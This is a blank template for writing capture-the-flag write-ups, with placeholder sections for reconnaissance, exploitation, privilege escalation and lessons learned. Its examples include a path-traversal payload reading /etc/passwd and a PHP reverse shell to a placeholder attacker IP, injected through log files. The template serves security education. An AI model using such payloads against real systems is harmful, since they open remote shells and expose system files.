CTF Writeup
Event/Platform: [Hack The Box / TryHackMe / PicoCTF / Local Event] Date Solved: [YYYY-MM-DD] Category: [Web / Reverse Engineering / Pwn / Crypto / Forensics / Misc] Difficulty: [Easy / Medium / Hard / Insane]
🔍 Initial Discovery and Reconnaissance
How did you first approach the problem?
- Target: [IP Address / URL / File Name]
- Initial Step: [e.g., "Ran Nmap scan on all ports."]
- Key Finding: [The one piece of information that pointed you in the right direction, e.g., "Discovered a hidden
.gitdirectory."]
Code Block Example (Nmap Output):
# nmap -sC -sV [IP] PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) 22/tcp open ssh OpenSSH 8.2p1 Ubuntu
🧩 Exploitation Path and Steps
Detail the logical sequence of steps that led to the flag. Break this down into smaller, digestible phases.
Phase 1: Finding the Vulnerability (e.g., Web App)
- Tool Used: [Burp Suite / Dirb / Nikto]
- Action: [e.g., "Fuzzing a parameter in the contact form."]
- Vulnerability Type: [e.g., Local File Inclusion (LFI)]
- Proof: [e.g., "The application returned the contents of
/etc/passwdwhen the payload../../etc/passwdwas injected."]
Phase 2: Gaining Access/Shell
- Technique: [e.g., "Used the LFI to access the log files and inject a PHP reverse shell."]
- Payload/Command:
<?php system("bash -c 'bash -i >& /dev/tcp/[ATTACKER_IP]/[PORT] 0>&1'"); ?> - Result: [e.g., "Successfully obtained a low-privilege shell as user
www-data."]
Phase 3: Privilege Escalation (if necessary)
- Method: [e.g., Misconfigured SUID binary]
- Tool: [e.g., LinPEAS, manually checked
sudo -l] - Final Action: [Command used to escalate, e.g.,
sudo /usr/bin/python3 /tmp/exploit.py]
🏆 The Flag
Document the final steps and the flag itself.
- Location: [The file path or database table where the flag was found.]
- Flag Value: (Optional, often replace with
[FLAG REDACTED])FLAG{[REDACTED_EXAMPLE_FLAG]}
🧠 Key Takeaway
What specific technical or problem-solving concept did this challenge reinforce?
- [e.g., "Reinforced the importance of manual code review, as automated tools missed the vulnerability."]
- [e.g., "Learned a new technique for exploiting deserialization flaws in Python."]